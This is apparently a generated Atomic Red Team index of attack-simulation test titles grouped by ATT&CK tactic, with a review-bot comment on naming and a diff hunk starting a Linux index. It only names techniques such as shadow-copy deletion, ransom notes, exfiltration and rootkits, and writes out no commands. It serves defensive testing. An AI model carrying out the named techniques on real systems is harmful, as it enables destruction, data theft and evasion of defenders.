- T1588.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.005 Link Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.003 Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1650 Acquire Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.007 Serverless [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.006 SEO Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# reconnaissance
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1592.001 Gather Victim Host Information: Hardware](../../T1592.001/T1592.001.md)
- Atomic Test #1: Enumerate PlugNPlay Camera [windows]
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595 Active Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.003 Wordlist Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- Atomic Test #4: Change User Password via passwd [macos, linux]
- Atomic Test #5: Delete User via dscl utility [macos]
- Atomic Test #6: Delete User via sysadminctl utility [macos]
- Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad]
- Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
- Atomic Test #8: Data Encrypted with GPG4Win [windows]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1566.001 Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
- Atomic Test #8: Python3 http.server [linux]
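Review bot: two entries under T1048 Exfiltration Over Alternative Protocol carry the same name, `Atomic Test #1: Exfiltration Over Alternative Protocol - SSH` and `Atomic Test #2: Exfiltration Over Alternative Protocol - SSH`, so a reader of this index cannot tell the two tests apart; give the second a distinguishing name (or, if these index lines are generated, correct the name in the test definition they are built from). Separately, the T1048.002 heading joins technique and sub-technique with a dash (`Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol`) while the neighbouring T1048.003 and T1567.002 headings use a colon; align it with the others so the index renders consistently.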
@@ -1,786 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #13: Delete system journal logs via rm and journalctl utilities [linux]
- Atomic Test #14: Overwrite Linux Mail Spool [linux]
- Atomic Test #15: Overwrite Linux Log [linux]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #8: XOR decoding and command execution using Python [linux, macos]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #2: Disable journal logging via systemctl utility [linux]
- Atomic Test #3: Disable journal logging via sed utility [linux]
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #2: Copy and Delete Mailbox Data on Linux [linux]
- Atomic Test #5: Copy and Modify Mailbox Data on Linux [linux]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- Atomic Test #16: Disable iptables [linux]
- Atomic Test #17: Modify/delete iptables firewall rules [linux]
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
